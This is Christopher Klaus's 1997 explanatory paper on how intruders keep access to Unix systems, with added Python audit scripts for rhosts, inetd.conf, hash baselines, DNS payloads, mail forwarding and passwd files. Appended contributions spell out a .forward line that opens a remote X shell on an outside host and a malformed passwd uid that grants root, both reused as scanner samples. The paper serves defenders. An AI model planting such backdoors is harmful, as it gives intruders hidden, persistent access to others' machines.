Backdoors

By Christopher Klaus, 8/4/97
Since the early days of intruders breaking into computers, they have tried to develop techniques, or backdoors, that allow them to get back into the system. This paper focuses on many of the common backdoors and possible ways to check for them. Most of the focus will be on Unix backdoors, with some discussion of future Windows NT backdoors. It describes the complexity of the issues in trying to determine the methods that intruders use, and gives administrators a basis for understanding how they might be able to stop intruders from getting back in. When an administrator understands how difficult it would be to stop an intruder once they are in, the value of being proactive and blocking the intruder from ever getting in becomes better understood. This is intended to cover many of the popular backdoors commonly used by beginner and advanced intruders. It is not intended to cover every possible way to create a backdoor, as the possibilities are limitless.
The backdoor for most intruders provides two or three main functions:

Be able to get back into a machine even if the administrator tries to secure it, e.g., by changing all the passwords.

Be able to get back into the machine with the least amount of visibility. Most backdoors provide a way to avoid being logged, and many times the machine can appear to have no one online even while an intruder is using it.

Be able to get back into the machine with the least amount of time. Most intruders want to easily get back into the machine without having to do all the work of exploiting a hole to gain access.
In some cases, if the intruder thinks the administrator may detect any installed backdoor, they will resort to using the vulnerability repeatedly to get onto a machine as the only backdoor, thus not touching anything that may tip off the administrator. Therefore, in some cases, the vulnerabilities on a machine remain the only unnoticed backdoor.
Password Cracking Backdoor

One of the first and oldest methods intruders used to gain not only access to a Unix machine but also backdoors was to run a password cracker. This uncovers accounts with weak passwords. All these new accounts are now possible backdoors into a machine even if the system administrator locks out the intruder's current account. Many times, the intruder will look for unused accounts with easy passwords and change the password to something difficult. When the administrator looks for all the weakly passworded accounts, the accounts with modified passwords will not appear. Thus the administrator will not be able to easily determine which accounts to lock out.
Rhosts + + Backdoor

On networked Unix machines, services like rsh and rlogin use a simple authentication method based on hostnames that appear in rhosts. A user could easily configure which machines do not require a password to log in. An intruder that gained access to someone's rhosts file could put a "+ +" in the file, and that would allow anyone from anywhere to log into that account without a password. Many intruders use this method, especially when NFS is exporting home directories to the world. These accounts become backdoors for intruders to get back into the system. Many intruders prefer using rsh over rlogin because it many times lacks any logging capability. Many administrators check for "+ +", therefore an intruder may actually put in a hostname and username from another compromised account on the network, making it less obvious to spot.
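The check described above, as an added example that is not part of the original paper: it audits a .rhosts file for the "+ +" wildcard, for single wildcards, and for the quieter case the text mentions, an entry naming another account on the network that is not in the administrator's trusted set. The TRUSTED_HOSTS set and the sample file contents are constructed for the example.

```python
"""Audit the contents of a .rhosts file for entries that grant broad access.

Added example, not part of the original paper. Each line of a .rhosts file
names a host and, optionally, a user on that host who may log in without a
password; "+" in either position is a wildcard. The sample file and the
TRUSTED_HOSTS set below are constructed for this example.
"""
from dataclasses import dataclass
from typing import List

# Hosts from which passwordless rlogin/rsh is actually intended (constructed).
TRUSTED_HOSTS = {"ws1.example.com", "ws2.example.com"}


@dataclass
class Finding:
    line_no: int
    entry: str
    reason: str


def audit_rhosts(text: str, owner: str) -> List[Finding]:
    """Return one Finding per .rhosts entry that is wider than owner@TRUSTED_HOSTS."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else owner  # omitted user means same name
        if host.startswith("-") or user.startswith("-"):
            continue  # negative entries deny access; nothing to flag
        if host == "+" and user == "+":
            findings.append(Finding(line_no, raw, "any user from any host (+ +)"))
        elif host == "+":
            findings.append(Finding(line_no, raw, f"user {user} from any host"))
        elif user == "+":
            findings.append(Finding(line_no, raw, f"any user from {host}"))
        elif host.startswith("+@") or user.startswith("+@"):
            findings.append(Finding(line_no, raw, "netgroup entry; check group membership"))
        elif host not in TRUSTED_HOSTS:
            findings.append(Finding(line_no, raw, f"host {host} is not in the trusted set"))
        elif user != owner:
            findings.append(Finding(line_no, raw, f"foreign account {user}@{host} gets in as {owner}"))
    return findings


# Constructed sample: a legitimate entry, the classic wildcard, and the quieter
# variant the paper describes (another account elsewhere on the network).
SAMPLE_RHOSTS = """\
ws1.example.com
+ +
ws2.example.com bob
mailhub.example.com alice
"""

if __name__ == "__main__":
    for f in audit_rhosts(SAMPLE_RHOSTS, owner="alice"):
        print(f"line {f.line_no}: {f.reason}: {f.entry!r}")
```

Run it over every home directory's .rhosts (and /etc/hosts.equiv, which has the same format) rather than grepping for "+ +" alone; the entries that survive a wildcard grep are exactly the ones the last sentence above warns about.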
Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions. Many system administrators relied on time-stamping and the system checksum programs, e.g., Unix's sum program, to try to determine when a binary file had been modified. Intruders have developed technology that will recreate the same time-stamp for the trojan file as the original file. This is accomplished by setting the system clock back to the original file's time and then adjusting the trojan file's time to the system clock. Once the binary trojan file has the exact same time as the original, the system clock is reset to the current time. The sum program relies on a CRC checksum and is easily spoofed. Intruders have developed programs that would modify the trojan binary to have the necessary original checksum, thus fooling the administrators. MD5 checksums are the recommended choice to use today by most vendors. MD5 is based on an algorithm that no one has, to date, proven can be spoofed.
Login Backdoor

On Unix, the login program is the software that usually does the password authentication when someone telnets to the machine. Intruders grabbed the source code to login.c and modified it so that when login compared the user's password with the stored password, it would first check for a backdoor password. If the user typed in the backdoor password, it would allow them to log in regardless of what the administrator set the passwords to. Thus this allowed the intruder to log into any account, even root. The password backdoor would spawn access before the user actually logged in and appeared in utmp and wtmp. Therefore an intruder could be logged in and have shell access without it appearing that anyone is on that machine as that account. Administrators started noticing these backdoors, especially if they did a "strings" command to find what text was in the login program. Many times the backdoor password would show up. The intruders then encrypted or hid the backdoor password better so it would not appear by just doing strings. Many administrators can detect these backdoors with MD5 checksums.
Telnetd Backdoor

When a user telnets to the machine, the inetd service listens on the port, receives the connection, and then passes it to in.telnetd, which then runs login. Some intruders knew the administrator was checking the login program for tampering, so they modified in.telnetd. Within in.telnetd, it does several checks from the user for things like what kind of terminal the user is using. Typically, the terminal setting might be Xterm or VT100. An intruder could backdoor it so that when the terminal was set to "letmein", it would spawn a shell without requiring any authentication. Intruders have backdoored some services so that any connection from a specific source port can spawn a shell.
Services Backdoor

Almost every network service has at one time been backdoored by an intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even inetd, etc., have been floating around forever. There are programs that are nothing more than a shell connected to a TCP port, with maybe a backdoor password to gain access. These programs sometimes replace a service like uucp that never gets used, or they get added to the inetd.conf file as a new service. Administrators should be very wary of what services are running and analyze the original services by MD5 checksums.
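One way to review an inetd.conf against what the site intends to run, as an added example (not code from the paper): it flags entries that bind a shell directly to a port, services that are not in the expected set, and expected services whose program path or account differ from the baseline. The EXPECTED table and the sample configuration are constructed; in practice the table comes from a known-good baseline of the host.

```python
"""Review an inetd.conf for entries that bind a shell or an unexpected program to a port.

Added example; not code from the paper. Active inetd.conf lines have the form
  service socket_type protocol wait/nowait user server_program [arguments...]
The expected-service table and the sample configuration are constructed.
"""
from typing import Dict, List, Tuple

# service name -> (server program the site installed, account it should run as)
EXPECTED: Dict[str, Tuple[str, str]] = {
    "ftp": ("/usr/sbin/in.ftpd", "root"),
    "telnet": ("/usr/sbin/in.telnetd", "root"),
    "finger": ("/usr/sbin/in.fingerd", "nobody"),
}
# Programs that have no business being an inetd server or server argument.
SHELLS = {"/bin/sh", "/bin/csh", "/bin/tcsh", "/bin/bash", "/bin/ksh", "/usr/bin/perl"}

Finding = Tuple[int, str, str]  # (line number, raw line, reason)


def audit_inetd_conf(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            findings.append((line_no, raw, "malformed entry"))
            continue
        service, user, program = fields[0], fields[4], fields[5]
        args = fields[6:]
        if program in SHELLS or any(a in SHELLS for a in args):
            findings.append((line_no, raw, "shell bound directly to a port"))
        elif service not in EXPECTED:
            findings.append((line_no, raw, f"service {service} is not in the expected set"))
        elif program != EXPECTED[service][0]:
            findings.append((line_no, raw,
                             f"unexpected program for {service} (expected {EXPECTED[service][0]})"))
        elif user != EXPECTED[service][1]:
            findings.append((line_no, raw,
                             f"{service} runs as {user}, expected {EXPECTED[service][1]}"))
    return findings


# Constructed sample: three expected services (one running as the wrong user),
# a service the site never enabled, and the "unused service replaced by a shell"
# case the paper describes.
SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf
ftp     stream  tcp  nowait  root    /usr/sbin/in.ftpd     in.ftpd
telnet  stream  tcp  nowait  root    /usr/sbin/in.telnetd  in.telnetd
finger  stream  tcp  nowait  root    /usr/sbin/in.fingerd  in.fingerd
exec    stream  tcp  nowait  root    /usr/sbin/in.rexecd   in.rexecd
uucp    stream  tcp  nowait  root    /bin/sh               sh
"""

if __name__ == "__main__":
    for line_no, raw, reason in audit_inetd_conf(SAMPLE_INETD_CONF):
        print(f"line {line_no}: {reason}: {raw}")
```

The audit only covers what inetd.conf says; the program paths it names still need the MD5 comparison against a pre-attack baseline that the paragraph calls for, since a correct path can point at a replaced binary.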
Cronjob backdoor

Cron on Unix schedules when certain programs should be run. An intruder could add a backdoor shell program to run between 1 AM and 2 AM. So for 1 hour every night, the intruder could gain access. Intruders have also looked at legitimate programs that typically run from cron and built backdoors into those programs as well.
Library backdoors

Almost every Unix system uses shared libraries. The shared libraries are intended to reuse many of the same routines, thus cutting down on the size of programs. Some intruders have backdoored some of the routines like crypt.c and _crypt.c. Programs like login.c would use the crypt() routine, and if a backdoor password was used it would spawn a shell. Therefore, even if the administrator was checking the MD5 of the login program, it was still spawning a backdoor routine, and many administrators were not checking the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5 checksums of almost everything. One method intruders used to get around that is to backdoor the open() and file access routines. The backdoor routines were configured to read the original files, but execute the trojan backdoors. Therefore, when the MD5 checksum program was reading these files, the checksums always looked good. But when the system ran the program, it executed the trojan version. Even the trojan library itself could be hidden from the MD5 checksums. One way an administrator could get around this backdoor was to statically link the MD5 checksum checker and run it on the system. The statically linked program does not use the trojan shared libraries.
Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for libraries to bypass MD5 checksums could be used at the kernel level, except that even a statically linked program could not tell the difference. A good backdoored kernel is probably one of the hardest for administrators to find; fortunately kernel backdoor scripts have not yet been widely made available, and no one knows how widespread they really are.
File system backdoors

An intruder may want to store their loot or data on a server somewhere without the administrator finding the files. The intruder's files can typically contain their toolbox of exploit scripts, backdoors, sniffer logs, copied data like email messages, source code, etc. To hide these sometimes large files from an administrator, an intruder may patch the file system commands like "ls", "du", and "fsck" to hide the existence of certain directories or files. At a very low level, one intruder's backdoor created a section on the hard drive with a proprietary format that was designated as "bad" sectors on the hard drive. Thus an intruder could access those hidden files only with special tools, but to the regular administrator it is very difficult to determine that the marked "bad" sectors were indeed the storage area for the hidden file system.
Bootblock backdoors

In the PC world, many viruses have hidden themselves within the bootblock section, and most antivirus software will check to see if the bootblock has been altered. On Unix, most administrators do not have any software that checks the bootblock, therefore some intruders have hidden some backdoors in the bootblock area.
Process hiding backdoors

An intruder many times wants to hide the programs they are running. The programs they want to hide are commonly a password cracker or a sniffer. There are quite a few methods, and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look like another process name.

An intruder could rename the sniffer program to a legitimate service like in.syslog and run it. Thus when an administrator does a "ps" or looks at what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show all the processes.

An intruder could patch a backdoor or program into an interrupt driven routine so it does not appear in the process table. An example backdoor using this technique is amod.tar.gz, available on http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.
Rootkit

One of the most popular packages to install backdoors is rootkit. It can easily be located using Web search engines. From the Rootkit README, here are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
es - rokstar's ethernet sniffer for sun4 based kernels.
fix - try to fake checksums, install with same dates/perms/u/g.
sl - become root via a magic password sent to login.
ic - modified ifconfig to remove PROMISC flag from output.
ps - hides the processes.
ns - modified netstat to hide connections to certain machines.
ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but they also want to hide their network traffic as much as possible. These network traffic backdoors sometimes allow an intruder to gain access through a firewall. There are many network backdoor programs that allow an intruder to set up on a certain port number on a machine, which will allow access without ever going through the normal services. Because the traffic is going to a non-standard network port, the administrator can overlook the intruder's traffic. These network traffic backdoors typically use TCP, UDP, and ICMP, but it could be many other kinds of packets.
TCP Shell Backdoors

The intruder can set up these TCP shell backdoors on some high port number, possibly where the firewall is not blocking that TCP port. Many times, they will be protected with a password just so that an administrator that connects to it will not immediately see shell access. An administrator can look for these connections with netstat to see what ports are listening and where current connections are going to and from. Many times, these backdoors allow an intruder to get past TCP Wrapper technology. These backdoors could be run on the SMTP port, which many firewalls allow traffic to pass for e-mail.
UDP Shell Backdoors

Administrators many times can spot a TCP connection and notice the odd behavior, while UDP shell backdoors lack any connection, so netstat would not show an intruder accessing the Unix machine. Many firewalls have been configured to allow UDP packets for services like DNS through. Many times, intruders will place the UDP shell backdoor on that port and it will be allowed to bypass the firewall.
ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive, by sending and receiving ICMP packets. Many firewalls allow outsiders to ping internal machines. An intruder can put data in the ping ICMP packets and tunnel a shell between the pinging machines. An administrator may notice a flurry of ping packets, but unless the administrator looks at the data in the packets, an intruder can go unnoticed.
Encrypted Link

An administrator can set up a sniffer to try to see data that looks like someone accessing a shell, but an intruder can add encryption to the network traffic backdoors, and it becomes almost impossible to determine what is actually being transmitted between two machines.
Windows NT

Because Windows NT does not easily allow multiple users on a single machine and remote access similar to Unix, it becomes harder for the intruder to break into Windows NT, install a backdoor, and launch an attack from it. Thus you will more frequently find network attacks that are springboarded from a Unix box than from Windows NT. As Windows NT advances in multi-user technologies, this may give a higher frequency of intruders who use Windows NT to their advantage. And if this does happen, many of the concepts from Unix backdoors can be ported to Windows NT, and administrators can be ready for the intruder. Today, there are already telnet daemons available for Windows NT. Network traffic backdoors are very feasible for intruders to install on Windows NT.
Solutions

As backdoor technology advances, it becomes even harder for administrators to determine if an intruder has gotten in or if they have been successfully locked out.
Assessment

One of the first steps in being proactive is to assess how vulnerable your network is, thus being able to figure out what holes exist that should be fixed. Many commercial tools exist to help scan and audit the network and systems for vulnerabilities. Many companies could dramatically improve their security if they only installed the security patches made freely available by their vendors.
MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines. This MD5 baseline should be built up from clean systems, before a hacker attack. Once a hacker is in and has installed backdoors, trying to create a baseline after the fact could incorporate the backdoors into the baseline. Several companies had been hacked and had backdoors installed on their systems for many months. Over time, all the backups of the systems contained the backdoors. When some of these companies found out they had a hacker, they restored a backup in hopes of removing any backdoors. The effort was futile, since they were restoring all the files, even the backdoored ones. The binary baseline comparison needs to be done before an attack happens.
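The baseline comparison this section and the earlier Checksum and Timestamp and Library sections call for, as an added example that is not the paper's code. It uses SHA-256 rather than MD5 because MD5 collisions are now practical; the paper's point is unchanged: the baseline must be taken from a clean system before any compromise, and the comparison must not lean on timestamps, which an intruder can set at will. The demo() scenario is constructed in a temporary directory and shows a replaced file whose size and mtime match the original but whose hash does not.

```python
"""Build a cryptographic-hash baseline of a tree and diff a later snapshot against it.

Added example, not the paper's code. SHA-256 stands in for MD5; the procedure is
the one the paper describes. The demo() scenario is constructed.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

Baseline = Dict[str, Tuple[str, int]]  # relative path -> (sha256 hex digest, size)


def hash_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Baseline:
    """Hash every regular file under root; symlinks are skipped for brevity."""
    baseline: Baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = (hash_file(full), os.path.getsize(full))
    return baseline


def compare_baselines(old: Baseline, new: Baseline) -> Dict[str, List[str]]:
    """Report paths whose (hash, size) changed, appeared, or disappeared."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def demo() -> Tuple[Dict[str, List[str]], bool]:
    """Replace a 'binary' with a same-size file, restore its timestamps, add a hidden file.

    Returns the diff and whether the replaced file's mtime still equals the original,
    i.e. whether a timestamp-only check would have missed the replacement.
    """
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        login = os.path.join(bindir, "login")
        with open(login, "wb") as f:
            f.write(b"original login program\n")
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b"original ls program\n")
        before = build_baseline(root)  # the clean, pre-attack baseline
        original_stat = os.stat(login)

        # Same length as the original, so size does not change either; then put the
        # original timestamps back, as the paper says intruders do via the clock.
        with open(login, "wb") as f:
            f.write(b"trojaned login program\n")
        os.utime(login, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns))
        with open(os.path.join(bindir, ".hidden"), "wb") as f:
            f.write(b"tool stash\n")

        after = build_baseline(root)
        mtime_unchanged = os.stat(login).st_mtime_ns == original_stat.st_mtime_ns
        return compare_baselines(before, after), mtime_unchanged


if __name__ == "__main__":
    diff, mtime_unchanged = demo()
    print("mtime unchanged:", mtime_unchanged)
    print(diff)
```

Store the baseline off the host (or on read-only media) and run the comparison with a statically linked binary, as the Library backdoors section explains; a baseline kept on the compromised machine or compared through its shared libraries is what the open() backdoor in that section defeats.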
Intrusion detection

Intrusion detection is becoming more important as organizations are hooking up and allowing connections to some of their machines. Most of the older intrusion detection technology was based on logged events. The latest intrusion detection system (IDS) technology is based on real-time sniffing and network traffic security analysis. Many of the network traffic backdoors can now easily be detected. The latest IDS technology can take a look at the DNS UDP packets and determine if they match the DNS protocol requests. If the data on the DNS port does not match the DNS protocol, an alert flag can be signaled and the data captured for further analysis. The same principle can be applied to the data in an ICMP packet to see if it is the normal ping data or if it is carrying an encrypted shell session.
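The "does the data on the DNS port match the DNS protocol" check, as an added example that is not the paper's code: it parses the 12-byte header and walks every name in the question and resource-record sections using the label rules from RFC 1035, and reports the first thing that does not fit. A shell session carried over port 53 fails within the first few bytes. The sample packets are constructed; this is a heuristic for raising an alert and capturing the payload, not a complete protocol validator.

```python
"""Check whether a UDP payload seen on port 53 is structurally a DNS message.

Added example, not the paper's code. The sample packets are constructed.
"""
import struct
from typing import Tuple

VALID_OPCODES = {0, 1, 2, 4, 5}       # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
VALID_CLASSES = {1, 3, 4, 254, 255}   # IN, CH, HS, NONE, ANY


def _read_name(buf: bytes, pos: int) -> int:
    """Return the offset just past the domain name starting at pos, or raise ValueError."""
    total = 0
    while True:
        if pos >= len(buf):
            raise ValueError("name runs past end of message")
        length = buf[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:  # compression pointer: two bytes, terminates the name
            if pos + 1 >= len(buf):
                raise ValueError("truncated compression pointer")
            target = ((length & 0x3F) << 8) | buf[pos + 1]
            if target >= pos:
                raise ValueError("compression pointer does not point backwards")
            return pos + 2
        if length > 63:
            raise ValueError("label longer than 63 bytes or reserved label type")
        total += length + 1
        if total > 255:
            raise ValueError("name longer than 255 bytes")
        pos += 1 + length


def looks_like_dns(payload: bytes) -> Tuple[bool, str]:
    """(True, 'well-formed') or (False, reason) for the first structural violation."""
    if len(payload) < 12:
        return False, "shorter than a DNS header"
    _ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    if opcode not in VALID_OPCODES:
        return False, f"unassigned opcode {opcode}"
    if flags & 0x0040:
        return False, "reserved Z bit set"
    pos = 12
    try:
        for _ in range(qd):
            pos = _read_name(payload, pos)
            if pos + 4 > len(payload):
                raise ValueError("truncated question")
            _qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
            if qclass not in VALID_CLASSES:
                raise ValueError(f"unknown query class {qclass}")
            pos += 4
        for _ in range(an + ns + ar):  # answer, authority, additional sections
            pos = _read_name(payload, pos)
            if pos + 10 > len(payload):
                raise ValueError("truncated resource record")
            rdlength = struct.unpack("!H", payload[pos + 8:pos + 10])[0]
            pos += 10 + rdlength
            if pos > len(payload):
                raise ValueError("rdata runs past end of message")
    except ValueError as err:
        return False, str(err)
    if pos != len(payload):
        return False, f"{len(payload) - pos} trailing bytes after the last record"
    return True, "well-formed"


def build_query(name: str, qtype: int = 1, ident: int = 0x1234) -> bytes:
    """Constructed standard query with RD set; qtype 1 is an A record."""
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split("."))
    header = struct.pack("!HHHHHH", ident, 0x0100, 1, 0, 0, 0)
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


LEGIT_QUERY = build_query("www.example.com")
# Constructed: interactive shell output of the kind a port 53 tunnel would carry.
SHELL_TRAFFIC = b"$ id\nuid=0(root) gid=0(root)\n"

if __name__ == "__main__":
    for label, pkt in (("query", LEGIT_QUERY), ("shell", SHELL_TRAFFIC)):
        print(label, looks_like_dns(pkt))
```

Structural checks catch plain tunnels; a backdoor that wraps its data in syntactically valid DNS messages passes this test, which is why the paper pairs protocol matching with capturing the payload for further analysis.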
Boot from CD-ROM

Some administrators may want to consider booting from CD-ROM, thus eliminating the possibility of an intruder installing a backdoor on the CD-ROM. The problem with this method is the cost and time of implementing this solution enterprise wide.
Vigilant

Because the security field is changing so fast, with new vulnerabilities being announced daily and intruders constantly designing new attack and backdoor techniques, no security technology is effective without vigilance. Be aware that no defense is foolproof, and that there is no substitute for diligent attention.
-------------------------------------------------------------------------
you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account "username" a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Permutations of this method include alteration of the system's mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation; the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

PS: The above method is also useful for gaining access to a company's mailhub (assuming there is a shared home directory FS on the client and server).
> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
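A scan for the .forward and aliases deliveries discussed in the contribution above, as an added example that is not the contributor's code. It splits a .forward file (or the right-hand side of an alias) into its delivery targets and flags pipes to programs outside an allow-list, file appends, and :include: files. The allow-list and the sample files are constructed; the xterm pipe in the samples is the one quoted in the text.

```python
"""Scan .forward files and a sendmail aliases file for program and file deliveries.

Added example, not code from the contributor above. Targets are separated by
commas or newlines: an address, \\user for direct local delivery, /path to
append to a file, :include:/path, or |command to pipe the message into a
program. The allow-lists and samples are constructed.
"""
from typing import List, Tuple

# Programs a site may legitimately allow in pipes (constructed allow-list).
ALLOWED_PIPE_PROGRAMS = {"/usr/bin/procmail", "/usr/bin/vacation"}
ALLOWED_FILES = {"/dev/null"}

Finding = Tuple[str, str]  # (target as written, reason)


def split_targets(text: str) -> List[str]:
    """Split on commas and newlines that are outside double quotes."""
    targets, current, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        elif ch in ",\n" and not quoted:
            item = "".join(current).strip()
            if item:
                targets.append(item)
            current = []
            continue
        current.append(ch)
    item = "".join(current).strip()
    if item:
        targets.append(item)
    return targets


def audit_targets(text: str) -> List[Finding]:
    """Flag pipe, file and include deliveries in one .forward body or alias RHS."""
    findings: List[Finding] = []
    for target in split_targets(text):
        unquoted = target.strip('"').strip()
        if unquoted.startswith("|"):
            command = unquoted[1:].strip().strip('"')
            words = command.split()
            program = words[0] if words else "(empty command)"
            if program not in ALLOWED_PIPE_PROGRAMS:
                findings.append((target, f"pipes mail into {program}"))
        elif unquoted.startswith(":include:"):
            findings.append((target, "includes targets from a file"))
        elif unquoted.startswith("/") and unquoted not in ALLOWED_FILES:
            findings.append((target, "appends mail to a file"))
    return findings


def audit_aliases(text: str) -> List[Tuple[str, str, str]]:
    """Return (alias, target, reason) for every risky target in an aliases file."""
    entries: List[str] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and entries:  # continuation of the previous alias
            entries[-1] += " " + raw.strip()
        else:
            entries.append(raw.strip())
    findings = []
    for entry in entries:
        name, sep, rhs = entry.partition(":")
        if not sep:
            continue
        for target, reason in audit_targets(rhs):
            findings.append((name.strip(), target, reason))
    return findings


# Constructed samples; the xterm pipe is the entry quoted in the text above.
SAMPLE_FORWARD = (
    '\\alice, "|/usr/bin/procmail"\n'
    '|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"\n'
)
SAMPLE_ALIASES = """\
postmaster: root
root: alice
nobody: /dev/null
uucp: "|/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
"""

if __name__ == "__main__":
    print(audit_targets(SAMPLE_FORWARD))
    print(audit_aliases(SAMPLE_ALIASES))
```

As the quoted reply notes, smrsh restricts which programs a pipe may run; this scan is the complement, listing what the files currently ask for so that the smrsh allow-list and the findings can be reconciled.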
---------------------------------------------------------------------------
you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/passwd file, most login(1) implementations will fail to detect the wrong uid/gid and atoi(3) will set uid/gid to 0, giving superuser privileges.

example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.
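A passwd check for the condition described above, as an added example that is not the contributor's code: it parses the uid and gid fields strictly, reports what a lenient atoi(3)-style parse would have turned a malformed field into, and separately lists any account besides root whose uid is 0. The rmartin line is the one given in the text; the other entries are constructed.

```python
"""Check /etc/passwd entries with strict integer parsing and report what a lenient
atoi(3)-style parse would have made of malformed uid/gid fields.

Added example, not the contributor's code. The rmartin line comes from the text;
the remaining sample entries are constructed.
"""
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (account name or line label, reason)


def atoi_like(field: str) -> int:
    """Mimic C atoi: skip leading whitespace, optional sign, then digits; stop at
    the first non-digit; no digits at all yields 0."""
    i, n = 0, len(field)
    while i < n and field[i] in " \t\n\r\f\v":
        i += 1
    sign = 1
    if i < n and field[i] in "+-":
        sign = -1 if field[i] == "-" else 1
        i += 1
    value = 0
    while i < n and "0" <= field[i] <= "9":
        value = value * 10 + (ord(field[i]) - ord("0"))
        i += 1
    return sign * value


def strict_uint(field: str) -> int:
    """Accept only a non-empty run of ASCII digits."""
    if not field or any(not ("0" <= c <= "9") for c in field):
        raise ValueError(f"not a decimal integer: {field!r}")
    return int(field)


def audit_passwd(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {line_no}", f"expected 7 fields, found {len(fields)}"))
            continue
        name, uid_field, gid_field = fields[0], fields[2], fields[3]
        ids: Dict[str, int] = {}
        for label, field in (("uid", uid_field), ("gid", gid_field)):
            try:
                ids[label] = strict_uint(field)
            except ValueError:
                findings.append((name, f"{label} field {field!r} is not numeric; "
                                       f"atoi would give {atoi_like(field)}"))
        if ids.get("uid") == 0 and name != "root":
            findings.append((name, "additional uid 0 account"))
    return findings


SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
alice:x:1001:1001:Alice:/home/alice:/bin/sh
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
toor:x:0:0:alternate root:/root:/bin/sh
"""

if __name__ == "__main__":
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

Run against the live file after any suspected compromise and diff the result against the same check on the pre-attack baseline; a malformed uid field is easy to miss by eye because the rest of the line looks ordinary.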